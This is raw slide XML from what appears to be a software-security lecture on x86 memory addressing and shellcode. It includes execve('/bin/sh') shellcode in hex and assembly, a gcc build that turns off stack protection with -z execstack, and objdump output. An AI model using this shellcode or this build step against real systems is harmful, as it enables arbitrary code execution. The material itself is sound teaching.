            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[]</a:t>
            </a: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xb8\x0b\x00\x00\x00\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xbb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\x1c\x96"</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>x04\x08\x6a\x00\x68\x1c\x96\x04"</a:t>
            </a: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\x80\xb8\x01\x00\x00\x00\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xbb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"                 </a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRP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x00\x00\x00\x00\</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\x80";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>shell</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shell=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>shellcode</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shell</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>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gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -m32 -z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>execstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>test_shellcode.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pP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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="210035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5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5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5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57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57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57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57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579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579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57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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-m32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>preliminary_shellcode.s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>prelim</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>prelim</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1800" dirty="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08048394 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;: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8048394</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:       b8 0b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$0xb,%eax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8048399</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bb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 1c 96 04 08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$0x804961c,%ebx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804839e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:       6a 00                   push   $0x0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80483a0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:       68 1c 96 04 08          push   $0x804961c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80483a5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:       89 e1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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>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80483a7</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ba</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$0x0,%edx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80483ac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>: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80483ae</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:       b8 01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$0x1,%eax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80483b3</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bb</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$0x0,%ebx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80483b8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>: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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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199</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6308203" y="3240911"/>
            <a:ext cx="1284789" cy="358816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="508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308203" y="3782289"/>
            <a:ext cx="1284789" cy="358816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="508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43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Security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Applications provide services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Locally (word processing, file management)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Remotely (network services)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The behavior of an application is determined by the code being executed, the data being processed, and the environment in which the application is run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacks against applications aim at bringing applications to execute operations that violate the security of the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Violation of confidentiality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Violation of integrity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Violation of availability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="93583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7" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Memory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Addressing in x86</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1006598" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Users access memory with 32-bit addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Flat memory model: Memory is considered a single, continuous address space from 0 to 2^32 -1 (4GB)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Segmented memory model: Memory is a group of independent address spaces called segments, each addressable separately</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Real-address mode model: Memory model used for compatibility with 8086 CPUs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The memory architecture is paged (4K pages)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1006600" name="Picture 8" descr="memorymodels"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4495801" y="2171700"/>
            <a:ext cx="4358833" cy="3339063"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27905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65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65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65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65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65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6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Independent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>globl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> main</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	$11,</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>push /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\0	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	$0x0068732F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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>push /bin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push</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	$0x6E69622F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smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="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push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	$0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push </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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="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smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="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ecx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a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	$0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edx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solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(char* filename, char** </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
